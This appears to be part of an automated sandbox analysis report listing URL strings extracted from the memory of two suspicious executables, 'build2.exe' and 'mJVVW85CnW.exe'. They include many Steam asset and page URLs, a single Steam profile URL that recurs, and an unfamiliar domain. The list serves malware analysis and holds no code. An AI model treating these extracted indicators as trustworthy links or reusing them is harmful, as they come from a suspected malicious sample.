Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mJVVW85CnW.exe, 00000004.00000003.1806077260.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/react-native-community/react-native-netinfo
Source: build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: mJVVW85CnW.exe, 00000004.00000003.1801057478.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000008.00000002.2352727542.000000000098B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: build2.exe, 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
